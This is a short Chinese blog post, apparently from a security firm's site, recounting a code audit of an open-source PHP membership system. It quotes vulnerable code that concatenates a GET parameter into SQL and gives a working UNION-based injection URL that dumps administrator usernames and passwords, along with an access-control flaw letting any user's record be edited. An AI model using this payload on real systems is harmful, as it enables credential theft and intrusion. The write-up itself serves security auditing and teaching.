网站导航

新闻资讯

当前位置:首页 > 新闻资讯

记一次简单的代码审计

发布时间:2018-12-06

简要描述:

这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序
本着能省就省,有自行车还造什么轮子的原则于是乎git clone http...

详细介绍

这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序
image.png

本着能省就省,有自行车还造什么轮子的原则

于是乎

git clone https://github.com/chaodada/member.git

经过简单的部署后算是能打开了

image.pngimage.pngimage.png后台UI做的真心差评

image.png然后简单的看了下代码,发现几个SQL注入和一个越权

SQL注入

程序使用PDO连接数据库,后台使用了预编译SQL指令,没多大问题

看看前台用户处

xiu.php

image.png

if (isset($_GET['id'])) {
    $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
    $res = $pdo->query($sql);
    list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
}

很明显的GET型注入
爆管理员密码的payload:

http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23

image.png

越权

同样还是刚才那个位置
image.pngimage.pngid修改后即可更改任意用户信息

总结

这套程序距离实用还有不小的距离 适合入门级选手审计练手
程序下载地址:https://github.com/chaodada/member.git


 


推荐产品

如果您有任何问题,请跟我们联系!

联系我们

Copyright © 武汉网盾科技有限公司 版权所有 备案号:鄂ICP备2023003462号-5

地址:武汉市东湖高新区光谷大道光谷世贸中心A栋23楼

在线客服 联系方式 二维码

服务热线

18696195380/18672920250

扫一扫,关注我们

关闭